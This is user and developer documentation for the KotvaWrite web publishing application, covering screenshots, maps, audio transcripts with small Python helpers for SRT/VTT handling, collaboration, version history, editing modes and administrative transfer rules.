The application acts as a receiver for the browser's share function, through which it receives information about the web page open in the browser. Based on this information, the application can open the same page inside the application, so that the user can then take as many screenshots of it as needed. The screenshots are stored in the Pictures directory of the device and, when sent to the instance of the publishing application, they are stored in the image container Quick saves (every user has one by default). The aim is to keep the transferred images in as high a resolution as possible, in order to allow for any cropping that may be necessary at a later stage. The Exif data fields of these images are used by including the address and name of the web page in them. After the transfer, these end up as the Description and Source of the related images in the Quick saves image container.

The same application can also be used to simply save links and their names, where the saving can target a chosen adequate set and its adequate.

Without using a separate application, one can take a screenshot of the page behind a link by, e.g. adding the link first to an adequate and then selecting the "Take a screenshot" function (see the "Screenshots" section of the instructions) or by taking a screenshot using the functionality of the mobile device or its browser.

On Android, one can take a screenshot of a web page, even a full page, by first typing "chrome://flags" in the address bar, selecting "screenshots for android v2" from the numerous options, and setting it to "enabled". This will enable the "long screenshot" function in the browser, which will save the screenshot taken on the device to a file (to the directory "DCIM/Screenshots", the name of the screenshot file will be formed according to the standard format).

On iPad, one can take a full-page or partial screenshot of a web page by first pressing the Home and Volume buttons briefly, and then choosing between a screen and full-page screenshot. Saving will produce a PDF file if one takes a full-page screenshot, otherwise a PNG file. Both options allow one to do cropping. This works equally well in e.g. Safari and Edge. Title of the web page is automatically contained in the image file name.

The Edge browser, which comes standard with Windows 11, has a basic web snippet feature that lets one take a full-page screenshot of a web page or crop it as desired. The image file format is always JPEG. Alternatively, one can install a browser extension such as FireShot.

To export pages and annotations from PDF files to an image file, there are PDF reader applications available with an option to directly save a page as an image file to a selected location using the Share function. Sometimes they do not offer a very high resolution image, so a separate application specifically designed for this purpose, perhaps costing a couple of euros, may be a much better option (e.g. selectable image size, pages, file type, etc.). Once the images have been created from the PDF file, the importing view of the publishing application, opened in a browser on the same device, can be used to import the saved images for use in a solution or an adequate set of the publishing application.

Useful types of particulars under consideration

Besides avoiding placing a memory burden on the user of the publishing application, the intention is also to avoid a burden in terms of the cost, manageability or restrictions of external services. While some external services are needed only during the content production phase, some map services must remain at least partially available on a continuous basis if some public domain works contain interactive maps, and such services are not always free of charge without limits. To some extent, this is also a business decision, i.e. what can be promised to the client of the publishing application, etc.

Using maps in your writing is a spectacular way to clarify location. An external API is used for geocoding, i.e. to convert a given location such as a city name into map coordinates. There are a few different map services to choose from.

Third-party software components are used to display maps, and initial tryouts in implementing them have given rise to a wide range of ideas on how to allow the user to make use of the maps. Possibilities include the use of stylistically different map tiles, elements to be added on top of the map and route guidance. Another consideration is that the use of map services may be subject to a fee beyond a certain level of use and that the number of requests per time period may be limited. The user must obtain a user account for the map service API by registering as a user and then locate the required API key, which is placed in the user-specific settings of the publishing application.

Other particulars under consideration include podcasts, for which there are a few dozen hosting services that offer a supplementary web-based audio player that can be embedded on a web page. Should all of these be made available, or just some of them? Can such decisions be made more than once? Audio files can be used while waiting for a decision to be made.

Transcripts of audio recordings

It's easier to browse and understand audio recordings when one can simultaneously follow as text what is being said, what was said before and what will be said after a moment. Related to this there is the WebVTT (Web Video Text Tracks) standard, which, despite its name, also works with audio files and can be characterised as the representation of the text used in synchronisation with other media such as audio or video.

Making a VTT file from an audio recording is a form of transcription. There are several different online applications for this purpose, but not all of them recognise the Finnish language. They vary widely in pricing, some offer a certain amount of free transcription time per month, and they are very likely to produce results of differing quality.

One could use Google's Speech-to-Text API, which can be accessed directly from the Google Cloud console using a graphical user interface. Basically, an audio file is given as input, a few choices affecting quality are made, and then there is a short wait. After that, a download option becomes available, which can be used to retrieve an SRT file containing the transcribed audio. SRT files are almost identical to WebVTT files, both being human- and machine-readable text files. However, an SRT file needs to be converted to a VTT file before it can be used. This conversion requires a separate application, which can be a Windows application or, alternatively, one can use any of the many conversion services available on the web (try searching with "convert srt to vtt").
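
The SRT-to-VTT conversion is small enough to sketch in a few lines. The following is a minimal sketch in Python, not the converter used by any particular service or by the publishing application; the function name srt_to_vtt is hypothetical. It relies on the two differences that matter in practice: a WebVTT file starts with a WEBVTT header line, and its timestamps use a period instead of a comma before the milliseconds. The numeric cue counters of the SRT file are kept, as they are acceptable as cue identifiers in WebVTT.

```python
import re

# Matches an SRT timing line such as "00:00:01,000 --> 00:00:04,200".
_SRT_TIMING = re.compile(
    r"^(\d{2}:\d{2}:\d{2}),(\d{3}) --> (\d{2}:\d{2}:\d{2}),(\d{3})(.*)$"
)


def srt_to_vtt(srt_text: str) -> str:
    """Convert SRT subtitle text to WebVTT text (hypothetical helper)."""
    # Drop a possible byte order mark and normalise line endings.
    lines = srt_text.lstrip("\ufeff").replace("\r\n", "\n").split("\n")
    out = ["WEBVTT", ""]  # mandatory header followed by a blank line
    for line in lines:
        match = _SRT_TIMING.match(line.strip())
        if match:
            start, start_ms, end, end_ms, rest = match.groups()
            # Only the decimal separator of the timestamps changes.
            out.append(f"{start}.{start_ms} --> {end}.{end_ms}{rest}")
        else:
            # Cue counters, cue text and blank lines pass through unchanged.
            out.append(line)
    return "\n".join(out).rstrip("\n") + "\n"
```

Only timing lines are rewritten, so commas inside the spoken text are left alone.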

The user does not need to provide the publishing application with any input other than the URL of the audio file and the URL of the VTT file. These are used to generate an audio player, which displays an interactive transcript below it. Here interactivity means that clicking a part of the transcript text moves the player to the position from which the audio continues to play. As a listener progresses through the audio, the transcript text indicates which part of the audio is currently being listened to.
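
The two directions of this interactivity can be sketched as follows. This is a minimal sketch in Python under stated assumptions, not the player's actual implementation: the names Cue, parse_vtt and active_cue_index are hypothetical, and cues are assumed not to overlap in time. Clicking a cue corresponds to seeking to its start time, while highlighting corresponds to looking up the cue that contains the current playback position.

```python
import bisect
import re
from typing import List, NamedTuple, Optional


class Cue(NamedTuple):
    start: float  # seconds from the beginning of the audio
    end: float    # seconds from the beginning of the audio
    text: str


# WebVTT timing line; the hours part is optional ("mm:ss.ttt" is allowed).
_VTT_TIMING = re.compile(
    r"(?:(\d+):)?(\d{2}):(\d{2})\.(\d{3}) --> (?:(\d+):)?(\d{2}):(\d{2})\.(\d{3})"
)


def _seconds(hours, minutes, seconds, millis) -> float:
    return int(hours or 0) * 3600 + int(minutes) * 60 + int(seconds) + int(millis) / 1000


def parse_vtt(vtt_text: str) -> List[Cue]:
    """Return the cues of a WebVTT text, sorted by start time."""
    cues = []
    for block in vtt_text.replace("\r\n", "\n").split("\n\n"):
        lines = block.strip().split("\n")
        for i, line in enumerate(lines):
            match = _VTT_TIMING.match(line)
            if match:
                groups = match.groups()
                text = "\n".join(lines[i + 1:])
                cues.append(Cue(_seconds(*groups[:4]), _seconds(*groups[4:]), text))
                break  # the remaining lines of the block are the cue text
    return sorted(cues)


def active_cue_index(cues: List[Cue], position: float) -> Optional[int]:
    """Index of the cue to highlight at a playback position, or None."""
    starts = [cue.start for cue in cues]
    i = bisect.bisect_right(starts, position) - 1  # last cue starting at or before position
    if i >= 0 and position < cues[i].end:
        return i
    return None
```

A click on the cue at index i would then seek the player to cues[i].start.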

The VTT file must be located in a place that allows distribution of such files either everywhere or to the server used by the publishing application. It is recommended that both the audio file and the VTT file are placed on the CDN Storage provided by the CDN service you are already required to use, as the relevant Cross-Origin Resource Sharing (CORS) settings are easily found in its configuration.

Enabling the transcribe feature requires turning on the experimental functions in the user-specific settings. Audio-like particulars that have been created remain intact even after the experimental functions are turned off, meaning that they will also e.g. be included in backups. In this case, turning the experimental functions on or off will in practice just show or hide some interface elements.

Multi-user collaboration

It has been possible to grant editing rights on a project-by-project basis to users of the publishing application instance for a long time, but selecting co-editing users requires turning the experimental features on for a moment. Editing user permissions are strictly predefined and allow editing almost everything in a project except deleting it. Adequate sets, however, cannot be co-edited.

One could also share permissions by sharing the session code after login, but then one would be granting access to everything that can be done with that user account.

In the internal functions of the publishing application, the possibility of real-time machine-to-machine communication between users of the publishing application on two different terminals has been prepared, but has not been used for the purpose of co-editing.

Author markings are also just an intention, and they cannot be enabled even by turning on the experimental features. The idea has been to allow users to add authors both to their own writings and to writings belonging to projects to which they have received editing rights. They will be used in contexts in which the authors' details etc. will be displayed. E.g. in the fine-tuning view, you can add the contributors placeholder to the writing, which will be used to generate author information in the final version of the writing. The function for this can be found in the Tools menu ("Functional embed: contributors"). That placeholder can be converted to plain text by Alt-clicking.

These "authors" can be created in the Authors tab of the user preferences, and they can be transferred from one user to another if necessary. They can be used to communicate to readers the role played by each author in the creation of the writing. Later on, images can also be used, but at this stage these authors are text only. Users with editing rights will not be able to remove authors other than their own.

These authors are loosely decoupled from writings in such a way that if a project is first exported and then deleted from among other projects, the relationship between them is broken. The backup will only include a hint of the author's name, but on the other hand there will be a semi-automatic function in the Usabilities view to reconnect authors.

Past riskiness of the text editor component

The text editor component has long been perceived as something of a risk, as there seemed to be no newer version coming from its developer, even though it had been promised several years ago. Version 1.3.7 was released in September 2019 and the first beta version of the next version was not released until December 2023. From then on, it took another six months and many additional changes and bug fixes before it could be perceived as a stable upgrade that might be worth trying.

One of the long-standing problems was the Undo/Redo function causing the text editor content to become disordered and the cursor to jump oddly to wrong places. That seems to be fixed. Fortunately, there are not many other software components like this, so no switch to another one was made.

The text editor component has been used, among other things, for its extensibility, as it is convenient to prepare new elements for it to use in writings (e.g. placeholders), and a well-functioning Undo/Redo is very important when there are many different styles in a writing.

Earlier versions

KotvaWrite Stories and KotvaWrite Explanations (2017)

The main purpose of KotvaWrite has been to make it possible to carry out a large number of layout experiments and adjustments to literary works in a short enough time, so that the time spent waiting does not feel long and meaningful results can be reached effortlessly. However, the typesetting system (XeTeX) does not keep up with such a fast pace. This significantly guided the product development, and it was therefore decided to split the product into two lines: one (KotvaWrite Stories) producing HTML-based works with a wider range of style options, and the other (KotvaWrite Explanations) producing both PDF- and HTML-based works, but with slightly more limited layout and adjustment options.

JDK 1.8, JPA, REST, EclipseLink, Eclipse, Visual Paradigm for UML, Foundation, Backgrid, Backbone, Underscore.js, SASS, jQuery, HTML5, CSS 2.1/3, MySQL, MariaDB, MongoDB, JavaScript, NoSQL, JNDI, Tomcat 8, Digital Ocean, Putty, Linux command line tools, TeX, LaTeX, XeLaTeX, Loadster, NeoLoad, New Relic, Datadog, Nginx, HAProxy, Parse API, UML, Git, JUnit, Photoshop, MySQL Workbench

Process for generating preview images for a single writing

Java-based code generates a .tex file on the server side and then calls xelatex.exe or pdflatex.exe to produce a .pdf file whose structure and styling are mostly determined by the settings made in the web interface. The XeTeX typesetting system makes its best effort to compile the final result in one run, but sometimes it needs to be instructed to make another set of calculations after the first run. Apache PDFBox is used to generate thumbnails of individual pages for viewing in the web interface.
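
The "run again if needed" step can be sketched as below. This is a minimal sketch in Python for illustration only (the application itself is Java-based), and all function names are hypothetical. It assumes that a second run is needed whenever the LaTeX log contains the standard warning text "Rerun to get", and that an xelatex executable accepting the common -interaction, -halt-on-error and -output-directory options is on the PATH.

```python
import subprocess
from pathlib import Path
from typing import Callable


def needs_rerun(log_text: str) -> bool:
    """True if the log asks for another run (assumed marker: 'Rerun to get')."""
    return "Rerun to get" in log_text


def run_xelatex(tex_file: Path) -> str:
    """Run xelatex once on tex_file and return the contents of its .log file."""
    subprocess.run(
        [
            "xelatex",
            "-interaction=nonstopmode",  # never stop to ask for input
            "-halt-on-error",            # fail fast instead of producing a broken PDF
            f"-output-directory={tex_file.parent}",
            str(tex_file),
        ],
        check=True,
        capture_output=True,
    )
    return tex_file.with_suffix(".log").read_text(errors="replace")


def compile_until_stable(run_once: Callable[[], str], max_runs: int = 3) -> int:
    """Call run_once until its log no longer asks for a rerun; return the run count."""
    for run_number in range(1, max_runs + 1):
        if not needs_rerun(run_once()):
            return run_number
    return max_runs  # gave up after max_runs attempts
```

In use, one might call compile_until_stable(lambda: run_xelatex(Path("book.tex"))), where book.tex is a placeholder file name. Passing the runner as a callable keeps the loop testable without a TeX installation.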

KotvaWrite 2

It is still a web application for producing book-length, online readable works. The application consists of four parts that can be used for the following:

Importing of material to be used in writings from a multitude of sources.
Arranging material and writings.
Text writing and editing.
Compiling writings into a literary work that gets generated on the basis of parameters that affect layout, styling and presentation.

The most significant renovation compared to the previous version has happened at the interface level as it has been completely redesigned. The application has been designed using responsive design to substantially improve the user experience. Some additional features have been added since then (including an automatically generated PDF file and fine-tuning of the print version of the HTML version).

Java EE 6, JPA, REST, EclipseLink, Eclipse, Oxygen XML, Visual Paradigm for UML, Foundation, Backgrid, Backbone, SASS, jQuery, HTML5, CSS 2.1, MySQL, OrientDB, XML, iText, JavaScript, NoSQL, JNDI, Tomcat 7, AppFog, UML, Mylyn, Git, JUnit, Photoshop, MySQL Workbench

KotvaWrite v1.0

KotvaWrite is a useful web application for creating and editing text-based material that can take a book-like structure (in essence, multiple writings placed in collections that can be combined into a larger whole), which can be exported as a PDF file or made readable by others in HTML format. Text can be accompanied by images, illustrations, drawings and certain other types of "attachments" often seen in blog posts.

Java EE 6, JPA, REST, EclipseLink, Eclipse, Oxygen XML, Visual Paradigm for UML, Dojo, jQuery, HTML5, CSS 2.1, MySQL, OrientDB, XML, JavaScript, NoSQL, JNDI, Tomcat 7, AppFog, UML, Mylyn, Git, JUnit, Photoshop, MySQL Workbench

Ancoaarmade (predecessor of KotvaWrite)

The idea was to develop a web application that would serve its users in needs such as writing down observations, self-learning, organising and publishing information, producing information, organising thoughts and remembering things. The final product will be a set of writings, which can be made public if desired, and which may consist of various collected or generated illustrative materials such as video clips, diagrams, pictures and drawings. Material can be brought in from external data sources or from a mobile phone.

Java EE 6, JAXB, JPA, EclipseLink, Eclipse, Oxygen XML, Visual Paradigm for UML, Dojo, jQuery, HTML5, CSS 2.1, MySQL, OrientDB, XML, JavaScript, NoSQL, JNDI, Tomcat 7, CloudBees, Amazon AWS, Jasmine, DOH Robot, UML, Microsoft Project, JIRA, Mylyn, Git, PureTest, CodePro Analytix, PMD, JUnit, Photoshop, Fireworks, SHA1, PayPal API, Chrome extension, Firefox Add-on, Mockingbird, Adobe AIR, MySQL Workbench, Jenkins, continuous integration, REST, async servlets + filters, refactoring, design patterns, naming conventions

Text flowing from one text area to another

The "spacious" text editing attempts to emulate pages placed side by side and underneath each other by using resizable text areas, where text is automatically run through as many other text areas as necessary as the text is typed or after text areas are resized. It is possible to move from one text area to another by using the arrow keys on the keyboard. If images or other attachments are attached to the writing, they will remain unchanged, even if they are not displayed in this mode to indicate that they are attached to the writing.

Spacious mode has a restriction, at least for now, that the font must be monospaced (fixed width), and there can be no formatting or included images in the writing (they will get removed). Also, the text cannot be copied with the mouse in such a way as to copy the contents of more than one text area at a time. At the bottom of the first text area there is a resize button that allows adjusting the size of all text areas, e.g. to have two wide and tall text areas next to each other, three oblong text areas next to each other or small text areas in a grid pattern. Excess text areas are automatically deleted or, if more are needed to accommodate the text, they are added. Adjusting the size of the browser window gives more control over how many text areas can be placed side by side. Those that cannot fit on one row will start a new row of text areas.
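
The monospaced-font restriction makes the flowing of text easy to reason about, since every text area then holds a fixed number of columns and rows. The following is a minimal sketch in Python of that idea, not the application's actual algorithm; the function name flow_text and the parameters cols and rows are hypothetical. The text is wrapped to the width of a text area and then cut into as many areas as are needed.

```python
import textwrap
from typing import List


def flow_text(text: str, cols: int, rows: int) -> List[str]:
    """Distribute text over text areas that each hold rows lines of cols characters."""
    lines: List[str] = []
    for paragraph in text.split("\n"):
        # textwrap.wrap returns [] for an empty paragraph; keep it as a blank line.
        lines.extend(textwrap.wrap(paragraph, width=cols) or [""])
    # Every group of `rows` wrapped lines fills one text area.
    areas = ["\n".join(lines[i:i + rows]) for i in range(0, len(lines), rows)]
    return areas or [""]
```

Resizing the text areas corresponds to calling the function again with new cols and rows values, which yields more or fewer areas for the same text.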

In spacious mode, it is possible to move text paragraphs forwards or backwards by placing the cursor over a text paragraph and pressing up or down arrow key together with the Ctrl key. The moving text paragraph will then swap places with the adjacent one. This functionality strengthens the feeling that the text is continuous as the text paragraph moves between text areas as well as in the same text area.
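
The swap itself can be sketched as follows. This is a minimal sketch in Python with a hypothetical function name; it assumes that Ctrl with the up arrow maps to a step of -1 and Ctrl with the down arrow to a step of +1, and that a move past either end of the writing is simply ignored.

```python
from typing import List


def move_paragraph(paragraphs: List[str], index: int, step: int) -> List[str]:
    """Return a copy in which the paragraph at index has swapped places with its neighbour."""
    target = index + step
    in_range = 0 <= index < len(paragraphs) and 0 <= target < len(paragraphs)
    if step not in (-1, 1) or not in_range:
        return list(paragraphs)  # nothing to swap with; leave the order unchanged
    result = list(paragraphs)
    result[index], result[target] = result[target], result[index]
    return result
```

Because the paragraphs form one list regardless of how they are spread over text areas, the same swap works within a text area and across a text area boundary.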

Image effects in combination or separately

The image selections made in the "image assorting" view can be used in some other views. In the "image effects processing" view, this means that the preselected images serve as the original images to which image effects are applied. Each effect or combination of effects generates a new image, which can be saved to the same image container by Ctrl-clicking on it.

There are a few different external services made available for generating image effects: some offer a set of combinable effects, others allow the use of mathematics to generate image effects, and some specialise in a particular form of image transformation, such as upscaling an image to a larger size using AI. These services require registering a user account, which in many cases allows generating an API key that needs to be put in the user settings of the publishing application. None of the chosen external services is meant to take so-called text prompts as input for generating images.

Visualizing writing finding groups

There is also a view for "visualising" how the descriptions of writing finding groups target all of the user's writings. In it, each writing's relation to the descriptions is presented using symbols, where a symbol means either that the writing has none of the descriptions in question or that it has one or more of them. The challenge for usability is that the user's mind gets overwhelmed with wondering which symbol is related to which writing finding group's description, and where to keep the descriptions in view while browsing through the listed writings, even though the writings are sorted and separated by project and writing collection. It is indeed possible that looking at these symbols makes them seem "empty" in their meaning. However, the descriptions of a single writing finding group can be taken into use by Ctrl-clicking on it.

Sideshows and functional embeds

Writing collections, writings and special pages are not the only things one can encounter on the front page of a solution. A feature called Sideshow allows placing a kind of information panel on the side of the front page, which can display results of queries from different databases, lists of writings by some criteria, news from other sites, advertisements, interactive features, etc.

Picture 1. Commands to fetch the latest news from two different API services.

Picture 2. Sideshow on the front page of a work that uses content list type "Out of ink".

Picture 3. Sideshow on the front page of a work that uses content list type "Plain structure".

To automatically enhance the content of writings, various types of functional embeds may be used. They appear alongside the writing when it is being edited, just like other placeholders. They can be used to add a list of subheadings from the writing, a list of contributors, a live news section with subheadings, etc., without much effort. These features are not guaranteed to be available until they are no longer considered experimental.

Stackable solutions in the list of published works

When there are e.g. several parts to a published publication series and a user has plenty of other published works, it may be clearer to let a stacked presentation indicate that there are several more solutions for a reader to select. In practice, this is done by adding a "#" character (without a space) after the group name in the solutions' settings, followed by a number. Then, on the Profile tab of the user preferences, in the "Stackable groups" text field, the information specifying the stack is added, following the syntax "group name#snippet number#snippet name#snippet title". The last two fields are optional, but the group name and the stack number (the second field) must be included. If there is more than one stack, they are separated by a semicolon.
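
How such a field value breaks down can be sketched with a small parser. This is a minimal sketch in Python, not the application's own parsing code; the names StackDefinition and parse_stackable_groups are hypothetical, and the example values used with it ("Travel", "Essays" and so on) are made up for illustration. It assumes that the second field is a whole number and that surrounding spaces can be ignored.

```python
from typing import List, NamedTuple, Optional


class StackDefinition(NamedTuple):
    group_name: str
    number: int
    name: Optional[str] = None   # optional third field
    title: Optional[str] = None  # optional fourth field


def parse_stackable_groups(value: str) -> List[StackDefinition]:
    """Parse a 'Stackable groups' value: entries split by ';', fields split by '#'."""
    stacks = []
    for entry in value.split(";"):
        entry = entry.strip()
        if not entry:
            continue  # tolerate a trailing semicolon or an empty field
        parts = [part.strip() for part in entry.split("#")]
        valid = 2 <= len(parts) <= 4 and parts[0] and parts[1].isdecimal()
        if not valid:
            raise ValueError(f"invalid stack definition: {entry!r}")
        optional = [part or None for part in parts[2:]]
        stacks.append(StackDefinition(parts[0], int(parts[1]), *optional))
    return stacks
```

For example, the made-up value "Travel#1#asia#Journeys in Asia;Essays#2" would yield two definitions, the second of which has neither of the optional fields.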

Clicking on a stack in a solution index will show the solutions in that stack, arranged similarly, without changing the web address.

If you later decide that you don't want to use a certain stack, it is not necessary to edit group names in the settings of each solution, as it is sufficient to remove the defined stack in the user settings. Any additions to the group names, such as "#1", will then simply remain unused.

One of the things that makes this experimental is that many browsers do not apply the antialiasing effect to images that have been rotated, which then look rather coarse, especially images containing text [correction: CSS styling with "transform-style: preserve-3d;" fixes the problem].

Management, administrating

This view, which requires a separate login account, is not intended to be used very often. Usually it needs to be accessed only briefly at the very beginning of becoming a customer of the publishing application, so that the CDN address can be set. Until it is set, the footer of every public page contains a message about the missing CDN address.

It provides, among other things, the possibility to create new users and to edit user-specific constraints. Some areas of the managing view contain just information, e.g. "how much outbound transfer bandwidth has been used in the current billing cycle".

If a project meant to be transferred to another user has adequate sets attached to it, these associations will be removed. However, adequate sets can be transferred from one user to another separately.

The rules for user-to-user transfers are:

a project can be transferred from one user to another if the project's catalogs are used only by that project; otherwise the transfer attempt is aborted from the start
a catalog can be transferred from one user to another if the catalog is not used by any project
a solution can be transferred from one project to another if they are from the same user
an adequate set can be transferred from one user to another, but the adequate set is detached from all projects
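
The rules listed above can be sketched as simple checks. This is a minimal sketch in Python over a made-up in-memory model, not the application's database logic; the Project class, its fields and all function names are hypothetical.

```python
from dataclasses import dataclass, field
from typing import Dict, Set


@dataclass
class Project:
    owner: str
    catalogs: Set[str] = field(default_factory=set)       # ids of catalogs used by the project
    adequate_sets: Set[str] = field(default_factory=set)  # ids of attached adequate sets


def can_transfer_project(project_id: str, projects: Dict[str, Project]) -> bool:
    """A project may move only if no other project uses any of its catalogs."""
    own = projects[project_id].catalogs
    return all(
        own.isdisjoint(other.catalogs)
        for other_id, other in projects.items()
        if other_id != project_id
    )


def can_transfer_catalog(catalog_id: str, projects: Dict[str, Project]) -> bool:
    """A catalog may move only if no project uses it."""
    return all(catalog_id not in project.catalogs for project in projects.values())


def can_transfer_solution(source: Project, target: Project) -> bool:
    """A solution may move between projects only if both belong to the same user."""
    return source.owner == target.owner


def detach_adequate_set(set_id: str, projects: Dict[str, Project]) -> None:
    """An adequate set may always move, but it is first detached from all projects."""
    for project in projects.values():
        project.adequate_sets.discard(set_id)
```

Checking before acting matches the note that a disallowed project transfer is aborted from the start rather than partially carried out.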

These transfers typically require a relevant id code (e.g. projectid) and the username of the user to whom something is meant to be transferred. The text fields for these are helpful in that after entering an id or username and clicking outside the text fields, additional information about e.g. the target user is retrieved for display.

On rare occasions, one might choose from the normal user accounts the one that will become the main user, i.e. the one whose public solutions will be listed when going to the domain's index page. Otherwise, a user listing is displayed, from which one can select to see the user-specific listing of published solutions.

If necessary (highly unlikely), there is a simple button that can be used to clear the contents of the long-lived caches that form in the main memory of the servers in use. Such caches include a partial copy of the database contents with relations, as it is much faster to retrieve information from memory than from the database, which is located on a slower SSD.

It is possible to choose to reduce the visible size of the listed public solutions when they are viewed in a smallish browser window, so that more of them can be displayed at once, or to place them underneath each other without hiding the descriptive text of the solutions.

Usability checks

This user-specific view is very prototypical and not just in its naming. It is intended to

a) Make one aware of possible problems (Problems) that may occur, e.g. when elements are transferred from project to project in a slightly incomplete way and something is forgotten. Where possible, "one-click" fixes are available.

b) Confirm something that needs a little more clarification (Clarifications), such as the lengths (in terms of time) of solutions' caches and images that are in some image catalogs but are not used anywhere. There is also a somewhat similar option in the "browse image catalogs" view, which filters image lists to show only those images that are not yet used anywhere. When one has a lot of pictures, things like that can get forgotten.

c) Remind one manually (Reminders) about something that might need to be or should be checked periodically, e.g. by listing writings that are marked as "preparing". It is possible that this functionality could end up somewhere else with a different implementation.

The aim was to make this screen useful without the user needing to do much clicking, and thus to have all the relevant information loaded at once. This may also mean that something is better utilized elsewhere. E.g. it is convenient to optionally list writings with a readiness status of "preparing" in the "project listing" view.
